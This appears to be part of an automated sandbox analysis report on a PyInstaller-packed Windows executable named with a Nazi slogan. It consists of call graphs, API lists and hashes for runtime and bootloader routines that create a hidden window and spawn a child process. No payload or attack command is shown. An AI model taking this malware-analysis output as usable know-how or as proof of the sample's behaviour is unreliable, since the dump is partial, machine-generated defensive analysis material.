19498->19499 19500 7ff633d82699 19499->19500 19501 7ff633d827ef 19500->19501 19502 7ff633d826d6 IsValidCodePage 19500->19502 19508 7ff633d826f0 memcpy_s 19500->19508 19503 7ff633d6c550 _log10_special 8 API calls 19501->19503 19502->19501 19504 7ff633d826e7 19502->19504 19505 7ff633d82431 19503->19505 19506 7ff633d82716 GetCPInfo 19504->19506 19504->19508 19505->19465 19505->19469 19506->19501 19506->19508 19525 7ff633d820dc 19508->19525 19581 7ff633d802d8 EnterCriticalSection 19509->19581 19526 7ff633d82119 GetCPInfo 19525->19526 19527 7ff633d8220f 19525->19527 19526->19527 19532 7ff633d8212c 19526->19532 19528 7ff633d6c550 _log10_special 8 API calls 19527->19528 19529 7ff633d822ae 19528->19529 19529->19501 19530 7ff633d82e40 48 API calls 19531 7ff633d821a3 19530->19531 19536 7ff633d87b84 19531->19536 19532->19530 19535 7ff633d87b84 54 API calls 19535->19527 19537 7ff633d74f4c 45 API calls 19536->19537 19538 7ff633d87ba9 19537->19538 19541 7ff633d87850 19538->19541 19542 7ff633d87891 19541->19542 19543 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19542->19543 19547 7ff633d878db 19543->19547 19544 7ff633d87b59 19545 7ff633d6c550 _log10_special 8 API calls 19544->19545 19546 7ff633d821d6 19545->19546 19546->19535 19547->19544 19548 7ff633d7d5fc _fread_nolock 12 API calls 19547->19548 19549 7ff633d87a11 19547->19549 19550 7ff633d87913 19547->19550 19548->19550 19549->19544 19551 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19549->19551 19550->19549 19552 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19550->19552 19551->19544 19553 7ff633d87986 19552->19553 19553->19549 19572 7ff633d7f0e4 19553->19572 19556 7ff633d87a22 19558 7ff633d7d5fc _fread_nolock 12 API calls 19556->19558 19560 7ff633d87af4 19556->19560 19562 7ff633d87a40 19556->19562 19557 7ff633d879d1 19557->19549 19559 7ff633d7f0e4 __crtLCMapStringW 6 API calls 19557->19559 19558->19562 19559->19549 19560->19549 19561 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19560->19561 19561->19549 19562->19549 19563 7ff633d7f0e4 __crtLCMapStringW 6 API calls 19562->19563 19564 7ff633d87ac0 19563->19564 19564->19560 19565 7ff633d87af6 19564->19565 19566 7ff633d87ae0 19564->19566 19568 7ff633d807e8 WideCharToMultiByte 19565->19568 19567 7ff633d807e8 WideCharToMultiByte 19566->19567 19569 7ff633d87aee 19567->19569 19568->19569 19569->19560 19570 7ff633d87b0e 19569->19570 19570->19549 19571 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19570->19571 19571->19549 19573 7ff633d7ed10 __crtLCMapStringW 5 API calls 19572->19573 19574 7ff633d7f122 19573->19574 19575 7ff633d7f12a 19574->19575 19578 7ff633d7f1d0 19574->19578 19575->19549 19575->19556 19575->19557 19577 7ff633d7f193 LCMapStringW 19577->19575 19579 7ff633d7ed10 __crtLCMapStringW 5 API calls 19578->19579 19580 7ff633d7f1fe __crtLCMapStringW 19579->19580 19580->19577 19584 7ff633d794ad 19582->19584 19587 7ff633d79349 19582->19587 19583 7ff633d794d6 19586 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19583->19586 19584->19583 19585 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19584->19585 19585->19584 19586->19587 19587->19429 19589 7ff633d862d8 19588->19589 19590 7ff633d862c1 19588->19590 19589->19590 19593 7ff633d862e6 19589->19593 19591 7ff633d74f08 _get_daylight 11 API calls 19590->19591 19592 7ff633d862c6 19591->19592 19594 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19592->19594 19595 7ff633d74f4c 45 API calls 19593->19595 19596 7ff633d862d1 19593->19596 19594->19596 19595->19596 19596->19291 19598 7ff633d74f4c 45 API calls 19597->19598 19599 7ff633d88f71 19598->19599 19602 7ff633d88bc8 19599->19602 19605 7ff633d88c16 19602->19605 19603 7ff633d6c550 _log10_special 8 API calls 19604 7ff633d87205 19603->19604 19604->19290 19604->19291 19606 7ff633d88c9d 19605->19606 19608 7ff633d88c88 GetCPInfo 19605->19608 19611 7ff633d88ca1 19605->19611 19607 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19606->19607 19606->19611 19609 7ff633d88d35 19607->19609 19608->19606 19608->19611 19610 7ff633d7d5fc _fread_nolock 12 API calls 19609->19610 19609->19611 19612 7ff633d88d6c 19609->19612 19610->19612 19611->19603 19612->19611 19613 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19612->19613 19614 7ff633d88dda 19613->19614 19615 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19614->19615 19616 7ff633d88ebc 19614->19616 19618 7ff633d88e00 19615->19618 19616->19611 19617 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19616->19617 19617->19611 19618->19616 19619 7ff633d7d5fc _fread_nolock 12 API calls 19618->19619 19620 7ff633d88e2d 19618->19620 19619->19620 19620->19616 19621 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19620->19621 19622 7ff633d88ea4 19621->19622 19623 7ff633d88ec4 19622->19623 19624 7ff633d88eaa 19622->19624 19631 7ff633d7ef68 19623->19631 19624->19616 19627 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19624->19627 19627->19616 19628 7ff633d88f03 19628->19611 19630 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19628->19630 19629 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19629->19628 19630->19611 19632 7ff633d7ed10 __crtLCMapStringW 5 API calls 19631->19632 19633 7ff633d7efa6 19632->19633 19634 7ff633d7efae 19633->19634 19635 7ff633d7f1d0 __crtLCMapStringW 5 API calls 19633->19635 19634->19628 19634->19629 19636 7ff633d7f017 CompareStringW 19635->19636 19636->19634 19638 7ff633d87c5a HeapSize 19637->19638 19639 7ff633d87c41 19637->19639 19640 7ff633d74f08 _get_daylight 11 API calls 19639->19640 19641 7ff633d87c46 19640->19641 19642 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19641->19642 19643 7ff633d87c51 19642->19643 19643->19295 19645 7ff633d87c89 19644->19645 19646 7ff633d87c93 19644->19646 19648 7ff633d7d5fc _fread_nolock 12 API calls 19645->19648 19647 7ff633d87c98 19646->19647 19654 7ff633d87c9f _get_daylight 19646->19654 19649 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19647->19649 19652 7ff633d87c91 19648->19652 19649->19652 19650 7ff633d87ca5 19653 7ff633d74f08 _get_daylight 11 API calls 19650->19653 19651 7ff633d87cd2 HeapReAlloc 19651->19652 19651->19654 19652->19300 19653->19652 19654->19650 19654->19651 19655 7ff633d83590 _get_daylight 2 API calls 19654->19655 19655->19654 19657 7ff633d7ed10 __crtLCMapStringW 5 API calls 19656->19657 19658 7ff633d7ef44 19657->19658 19658->19304 19660 7ff633d754fa 19659->19660 19661 7ff633d754d6 19659->19661 19662 7ff633d75554 19660->19662 19663 7ff633d754ff 19660->19663 19665 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19661->19665 19666 7ff633d754e5 19661->19666 19664 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19662->19664 19663->19666 19668 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19663->19668 19673 7ff633d75514 19663->19673 19671 7ff633d75570 19664->19671 19665->19666 19666->19308 19666->19309 19667 7ff633d75577 GetLastError 19670 7ff633d74e7c _fread_nolock 11 API calls 19667->19670 19668->19673 19669 7ff633d7d5fc _fread_nolock 12 API calls 19669->19666 19675 7ff633d75584 19670->19675 19671->19667 19672 7ff633d755b2 19671->19672 19676 7ff633d755a5 19671->19676 19679 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19671->19679 19672->19666 19674 7ff633d7f8a0 _fread_nolock MultiByteToWideChar 19672->19674 19673->19669 19677 7ff633d755f6 19674->19677 19678 7ff633d74f08 _get_daylight 11 API calls 19675->19678 19680 7ff633d7d5fc _fread_nolock 12 API calls 19676->19680 19677->19666 19677->19667 19678->19666 19679->19676 19680->19672 19682 7ff633d79225 19681->19682 19689 7ff633d79221 19681->19689 19702 7ff633d82a3c GetEnvironmentStringsW 19682->19702 19685 7ff633d79232 19687 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19685->19687 19686 7ff633d7923e 19709 7ff633d7938c 19686->19709 19687->19689 19689->19337 19694 7ff633d795cc 19689->19694 19691 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19692 7ff633d79265 19691->19692 19693 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19692->19693 19693->19689 19695 7ff633d795ef 19694->19695 19700 7ff633d79606 19694->19700 19695->19337 19696 7ff633d7eb98 _get_daylight 11 API calls 19696->19700 19697 7ff633d7967a 19699 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19697->19699 19698 7ff633d7f8a0 MultiByteToWideChar _fread_nolock 19698->19700 19699->19695 19700->19695 19700->19696 19700->19697 19700->19698 19701 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19700->19701 19701->19700 19703 7ff633d7922a 19702->19703 19706 7ff633d82a60 19702->19706 19703->19685 19703->19686 19704 7ff633d7d5fc _fread_nolock 12 API calls 19705 7ff633d82a97 memcpy_s 19704->19705 19707 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19705->19707 19706->19704 19708 7ff633d82ab7 FreeEnvironmentStringsW 19707->19708 19708->19703 19710 7ff633d793b4 19709->19710 19711 7ff633d7eb98 _get_daylight 11 API calls 19710->19711 19724 7ff633d793ef 19711->19724 19712 7ff633d793f7 19713 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19712->19713 19715 7ff633d79246 19713->19715 19714 7ff633d79471 19716 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19714->19716 19715->19691 19716->19715 19717 7ff633d7eb98 _get_daylight 11 API calls 19717->19724 19718 7ff633d79460 19720 7ff633d794a8 11 API calls 19718->19720 19719 7ff633d80474 37 API calls 19719->19724 19721 7ff633d79468 19720->19721 19722 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19721->19722 19722->19712 19723 7ff633d79494 19725 7ff633d7a900 _isindst 17 API calls 19723->19725 19724->19712 19724->19714 19724->19717 19724->19718 19724->19719 19724->19723 19726 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19724->19726 19727 7ff633d794a6 19725->19727 19726->19724 19730 7ff633d88b31 __crtLCMapStringW 19728->19730 19729 7ff633d870ee 19729->19363 19729->19364 19730->19729 19731 7ff633d7ef68 6 API calls 19730->19731 19731->19729 20555 7ff633d6cb50 20556 7ff633d6cb60 20555->20556 20572 7ff633d79ba8 20556->20572 20558 7ff633d6cb6c 20578 7ff633d6ce48 20558->20578 20560 7ff633d6cbd9 20561 7ff633d6d12c 7 API calls 20560->20561 20571 7ff633d6cbf5 20560->20571 20563 7ff633d6cc05 20561->20563 20562 7ff633d6cb84 _RTC_Initialize 20562->20560 20583 7ff633d6cff8 20562->20583 20565 7ff633d6cb99 20586 7ff633d79014 20565->20586 20573 7ff633d79bb9 20572->20573 20574 7ff633d79bc1 20573->20574 20575 7ff633d74f08 _get_daylight 11 API calls 20573->20575 20574->20558 20576 7ff633d79bd0 20575->20576 20577 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20576->20577 20577->20574 20579 7ff633d6ce59 20578->20579 20580 7ff633d6ce5e __scrt_acquire_startup_lock 20578->20580 20579->20580 20581 7ff633d6d12c 7 API calls 20579->20581 20580->20562 20582 7ff633d6ced2 20581->20582 20611 7ff633d6cfbc 20583->20611 20585 7ff633d6d001 20585->20565 20587 7ff633d79034 20586->20587 20609 7ff633d6cba5 20586->20609 20588 7ff633d7903c 20587->20588 20589 7ff633d79052 GetModuleFileNameW 20587->20589 20590 7ff633d74f08 _get_daylight 11 API calls 20588->20590 20593 7ff633d7907d 20589->20593 20591 7ff633d79041 20590->20591 20592 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 20591->20592 20592->20609 20594 7ff633d78fb4 11 API calls 20593->20594 20595 7ff633d790bd 20594->20595 20596 7ff633d790c5 20595->20596 20599 7ff633d790dd 20595->20599 20597 7ff633d74f08 _get_daylight 11 API calls 20596->20597 20598 7ff633d790ca 20597->20598 20601 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20598->20601 20600 7ff633d790ff 20599->20600 20603 7ff633d7912b 20599->20603 20604 7ff633d79144 20599->20604 20602 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20600->20602 20601->20609 20602->20609 20605 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20603->20605 20607 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20604->20607 20606 7ff633d79134 20605->20606 20608 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20606->20608 20607->20600 20608->20609 20609->20560 20610 7ff633d6d0cc InitializeSListHead 20609->20610 20612 7ff633d6cfd6 20611->20612 20614 7ff633d6cfcf 20611->20614 20615 7ff633d7a1ec 20612->20615 20614->20585 20618 7ff633d79e28 20615->20618 20625 7ff633d802d8 EnterCriticalSection 20618->20625 20365 7ff633d7afd0 20366 7ff633d7afd5 20365->20366 20367 7ff633d7afea 20365->20367 20371 7ff633d7aff0 20366->20371 20372 7ff633d7b032 20371->20372 20373 7ff633d7b03a 20371->20373 20374 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20372->20374 20375 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20373->20375 20374->20373 20376 7ff633d7b047 20375->20376 20377 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20376->20377 20378 7ff633d7b054 20377->20378 20379 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20378->20379 20380 7ff633d7b061 20379->20380 20381 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20380->20381 20382 7ff633d7b06e 20381->20382 20383 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20382->20383 20384 7ff633d7b07b 20383->20384 20385 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20384->20385 20386 7ff633d7b088 20385->20386 20387 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20386->20387 20388 7ff633d7b095 20387->20388 20389 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20388->20389 20390 7ff633d7b0a5 20389->20390 20391 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20390->20391 20392 7ff633d7b0b5 20391->20392 20397 7ff633d7ae94 20392->20397 20411 7ff633d802d8 EnterCriticalSection 20397->20411 20626 7ff633d79d50 20629 7ff633d79ccc 20626->20629 20636 7ff633d802d8 EnterCriticalSection 20629->20636

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF633D689E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 0 7ff633d689e0-7ff633d68b26 call 7ff633d6c850 call 7ff633d69390 SetConsoleCtrlHandler GetStartupInfoW call 7ff633d753f0 call 7ff633d7a47c call 7ff633d7871c call 7ff633d753f0 call 7ff633d7a47c call 7ff633d7871c call 7ff633d753f0 call 7ff633d7a47c call 7ff633d7871c GetCommandLineW CreateProcessW 23 7ff633d68b4d-7ff633d68b89 RegisterClassW 0->23 24 7ff633d68b28-7ff633d68b48 GetLastError call 7ff633d62c50 0->24 26 7ff633d68b8b GetLastError 23->26 27 7ff633d68b91-7ff633d68be5 CreateWindowExW 23->27 32 7ff633d68e39-7ff633d68e5f call 7ff633d6c550 24->32 26->27 29 7ff633d68be7-7ff633d68bed GetLastError 27->29 30 7ff633d68bef-7ff633d68bf4 ShowWindow 27->30 31 7ff633d68bfa-7ff633d68c0a WaitForSingleObject 29->31 30->31 33 7ff633d68c0c 31->33 34 7ff633d68c88-7ff633d68c8f 31->34 36 7ff633d68c10-7ff633d68c13 33->36 37 7ff633d68cd2-7ff633d68cd9 34->37 38 7ff633d68c91-7ff633d68ca1 WaitForSingleObject 34->38 40 7ff633d68c1b-7ff633d68c22 36->40 41 7ff633d68c15 GetLastError 36->41 44 7ff633d68dc0-7ff633d68dd9 GetMessageW 37->44 45 7ff633d68cdf-7ff633d68cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->45 42 7ff633d68df8-7ff633d68e02 38->42 43 7ff633d68ca7-7ff633d68cb7 TerminateProcess 38->43 40->38 47 7ff633d68c24-7ff633d68c41 PeekMessageW 40->47 41->40 50 7ff633d68e04-7ff633d68e0a DestroyWindow 42->50 51 7ff633d68e11-7ff633d68e35 GetExitCodeProcess CloseHandle * 2 42->51 52 7ff633d68cb9 GetLastError 43->52 53 7ff633d68cbf-7ff633d68ccd WaitForSingleObject 43->53 48 7ff633d68ddb-7ff633d68de9 TranslateMessage DispatchMessageW 44->48 49 7ff633d68def-7ff633d68df6 44->49 46 7ff633d68d00-7ff633d68d38 MsgWaitForMultipleObjects PeekMessageW 45->46 54 7ff633d68d3a 46->54 55 7ff633d68d73-7ff633d68d7a 46->55 56 7ff633d68c76-7ff633d68c86 WaitForSingleObject 47->56 57 7ff633d68c43-7ff633d68c74 TranslateMessage DispatchMessageW PeekMessageW 47->57 48->49 49->42 49->44 50->51 51->32 52->53 53->42 58 7ff633d68d40-7ff633d68d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->44 59 7ff633d68d7c-7ff633d68da5 QueryPerformanceCounter 55->59 56->34 56->36 57->56 57->57 58->55 58->58 59->46 60 7ff633d68dab-7ff633d68db2 59->60 60->42 61 7ff633d68db4-7ff633d68db8 60->61 61->44
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                            • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                            • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                            • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                            • Instruction ID: 8cf410ab41b0fa40752e760cc4270562d31a1d9cbf9cda09278e672fccba3f4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9D1A832A08B8286E7108FB4E8562AD3764FF84B58F401335DA6EA7BA5DF3CE155D700
                                                                                                                                                                                                                                            Function 00007FF633D61000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 62 7ff633d61000-7ff633d63806 call 7ff633d6fe18 call 7ff633d6fe20 call 7ff633d6c850 call 7ff633d753f0 call 7ff633d75484 call 7ff633d636b0 76 7ff633d63808-7ff633d6380f 62->76 77 7ff633d63814-7ff633d63836 call 7ff633d61950 62->77 78 7ff633d63c97-7ff633d63cb2 call 7ff633d6c550 76->78 82 7ff633d6391b-7ff633d63931 call 7ff633d645c0 77->82 83 7ff633d6383c-7ff633d63856 call 7ff633d61c80 77->83 90 7ff633d6396a-7ff633d6397f call 7ff633d62710 82->90 91 7ff633d63933-7ff633d63960 call 7ff633d67f90 82->91 87 7ff633d6385b-7ff633d6389b call 7ff633d68830 83->87 97 7ff633d6389d-7ff633d638a3 87->97 98 7ff633d638c1-7ff633d638cc call 7ff633d74f30 87->98 101 7ff633d63c8f 90->101 99 7ff633d63962-7ff633d63965 call 7ff633d7004c 91->99 100 7ff633d63984-7ff633d639a6 call 7ff633d61c80 91->100 102 7ff633d638a5-7ff633d638ad 97->102 103 7ff633d638af-7ff633d638bd call 7ff633d689a0 97->103 109 7ff633d639fc-7ff633d63a2a call 7ff633d68940 call 7ff633d689a0 * 3 98->109 110 7ff633d638d2-7ff633d638e1 call 7ff633d68830 98->110 99->90 115 7ff633d639b0-7ff633d639b9 100->115 101->78 102->103 103->98 138 7ff633d63a2f-7ff633d63a3e call 7ff633d68830 109->138 119 7ff633d638e7-7ff633d638ed 110->119 120 7ff633d639f4-7ff633d639f7 call 7ff633d74f30 110->120 115->115 118 7ff633d639bb-7ff633d639d8 call 7ff633d61950 115->118 118->87 130 7ff633d639de-7ff633d639ef call 7ff633d62710 118->130 124 7ff633d638f0-7ff633d638fc 119->124 120->109 127 7ff633d63905-7ff633d63908 124->127 128 7ff633d638fe-7ff633d63903 124->128 127->120 131 7ff633d6390e-7ff633d63916 call 7ff633d74f30 127->131 128->124 128->127 130->101 131->138 141 7ff633d63b45-7ff633d63b53 138->141 142 7ff633d63a44-7ff633d63a47 138->142 143 7ff633d63a67 141->143 144 7ff633d63b59-7ff633d63b5d 141->144 142->141 145 7ff633d63a4d-7ff633d63a50 142->145 146 7ff633d63a6b-7ff633d63a90 call 7ff633d74f30 143->146 144->146 147 7ff633d63a56-7ff633d63a5a 145->147 148 7ff633d63b14-7ff633d63b17 145->148 157 7ff633d63aab-7ff633d63ac0 146->157 158 7ff633d63a92-7ff633d63aa6 call 7ff633d68940 146->158 147->148 149 7ff633d63a60 147->149 150 7ff633d63b19-7ff633d63b1d 148->150 151 7ff633d63b2f-7ff633d63b40 call 7ff633d62710 148->151 149->143 150->151 153 7ff633d63b1f-7ff633d63b2a 150->153 159 7ff633d63c7f-7ff633d63c87 151->159 153->146 161 7ff633d63ac6-7ff633d63aca 157->161 162 7ff633d63be8-7ff633d63bfa call 7ff633d68830 157->162 158->157 159->101 164 7ff633d63bcd-7ff633d63be2 call 7ff633d61940 161->164 165 7ff633d63ad0-7ff633d63ae8 call 7ff633d75250 161->165 170 7ff633d63bfc-7ff633d63c02 162->170 171 7ff633d63c2e 162->171 164->161 164->162 175 7ff633d63aea-7ff633d63b02 call 7ff633d75250 165->175 176 7ff633d63b62-7ff633d63b7a call 7ff633d75250 165->176 173 7ff633d63c04-7ff633d63c1c 170->173 174 7ff633d63c1e-7ff633d63c2c 170->174 177 7ff633d63c31-7ff633d63c40 call 7ff633d74f30 171->177 173->177 174->177 175->164 188 7ff633d63b08-7ff633d63b0f 175->188 186 7ff633d63b7c-7ff633d63b80 176->186 187 7ff633d63b87-7ff633d63b9f call 7ff633d75250 176->187 184 7ff633d63c46-7ff633d63c4a 177->184 185 7ff633d63d41-7ff633d63d63 call 7ff633d644e0 177->185 189 7ff633d63cd4-7ff633d63ce6 call 7ff633d68830 184->189 190 7ff633d63c50-7ff633d63c5f call 7ff633d690e0 184->190 199 7ff633d63d65-7ff633d63d6f call 7ff633d64630 185->199 200 7ff633d63d71-7ff633d63d82 call 7ff633d61c80 185->200 186->187 201 7ff633d63bac-7ff633d63bc4 call 7ff633d75250 187->201 202 7ff633d63ba1-7ff633d63ba5 187->202 188->164 206 7ff633d63ce8-7ff633d63ceb 189->206 207 7ff633d63d35-7ff633d63d3c 189->207 204 7ff633d63cb3-7ff633d63cb6 call 7ff633d68660 190->204 205 7ff633d63c61 190->205 214 7ff633d63d87-7ff633d63d96 199->214 200->214 201->164 217 7ff633d63bc6 201->217 202->201 216 7ff633d63cbb-7ff633d63cbd 204->216 211 7ff633d63c68 call 7ff633d62710 205->211 206->207 212 7ff633d63ced-7ff633d63d10 call 7ff633d61c80 206->212 207->211 225 7ff633d63c6d-7ff633d63c77 211->225 229 7ff633d63d2b-7ff633d63d33 call 7ff633d74f30 212->229 230 7ff633d63d12-7ff633d63d26 call 7ff633d62710 call 7ff633d74f30 212->230 220 7ff633d63dbc-7ff633d63dd2 call 7ff633d69390 214->220 221 7ff633d63d98-7ff633d63d9f 214->221 223 7ff633d63cc8-7ff633d63ccf 216->223 224 7ff633d63cbf-7ff633d63cc6 216->224 217->164 233 7ff633d63dd4 220->233 234 7ff633d63de0-7ff633d63dfc SetDllDirectoryW 220->234 221->220 227 7ff633d63da1-7ff633d63da5 221->227 223->214 224->211 225->159 227->220 231 7ff633d63da7-7ff633d63db6 LoadLibraryExW 227->231 229->214 230->225 231->220 233->234 237 7ff633d63ef9-7ff633d63f00 234->237 238 7ff633d63e02-7ff633d63e11 call 7ff633d68830 234->238 240 7ff633d63f06-7ff633d63f0d 237->240 241 7ff633d64000-7ff633d64008 237->241 251 7ff633d63e2a-7ff633d63e34 call 7ff633d74f30 238->251 252 7ff633d63e13-7ff633d63e19 238->252 240->241 244 7ff633d63f13-7ff633d63f1d call 7ff633d633c0 240->244 245 7ff633d6400a-7ff633d64027 PostMessageW GetMessageW 241->245 246 7ff633d6402d-7ff633d6405f call 7ff633d636a0 call 7ff633d63360 call 7ff633d63670 call 7ff633d66fc0 call 7ff633d66d70 241->246 244->225 258 7ff633d63f23-7ff633d63f37 call 7ff633d690c0 244->258 245->246 263 7ff633d63eea-7ff633d63ef4 call 7ff633d68940 251->263 264 7ff633d63e3a-7ff633d63e40 251->264 255 7ff633d63e1b-7ff633d63e23 252->255 256 7ff633d63e25-7ff633d63e27 252->256 255->256 256->251 271 7ff633d63f5c-7ff633d63f98 call 7ff633d68940 call 7ff633d689e0 call 7ff633d66fc0 call 7ff633d66d70 call 7ff633d688e0 258->271 272 7ff633d63f39-7ff633d63f56 PostMessageW GetMessageW 258->272 263->237 264->263 268 7ff633d63e46-7ff633d63e4c 264->268 269 7ff633d63e57-7ff633d63e59 268->269 270 7ff633d63e4e-7ff633d63e50 268->270 269->237 275 7ff633d63e5f-7ff633d63e7b call 7ff633d66dc0 call 7ff633d67340 269->275 274 7ff633d63e52 270->274 270->275 306 7ff633d63f9d-7ff633d63f9f 271->306 272->271 274->237 289 7ff633d63e7d-7ff633d63e84 275->289 290 7ff633d63e86-7ff633d63e8d 275->290 292 7ff633d63ed3-7ff633d63ee8 call 7ff633d62a50 call 7ff633d66fc0 call 7ff633d66d70 289->292 293 7ff633d63ea7-7ff633d63eb1 call 7ff633d671b0 290->293 294 7ff633d63e8f-7ff633d63e9c call 7ff633d66e00 290->294 292->237 304 7ff633d63ebc-7ff633d63eca call 7ff633d674f0 293->304 305 7ff633d63eb3-7ff633d63eba 293->305 294->293 308 7ff633d63e9e-7ff633d63ea5 294->308 304->237 318 7ff633d63ecc 304->318 305->292 310 7ff633d63fed-7ff633d63ffb call 7ff633d61900 306->310 311 7ff633d63fa1-7ff633d63fb7 call 7ff633d68ed0 call 7ff633d688e0 306->311 308->292 310->225 311->310 323 7ff633d63fb9-7ff633d63fce 311->323 318->292 324 7ff633d63fe8 call 7ff633d62a50 323->324 325 7ff633d63fd0-7ff633d63fe3 call 7ff633d62710 call 7ff633d61900 323->325 324->310 325->225
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
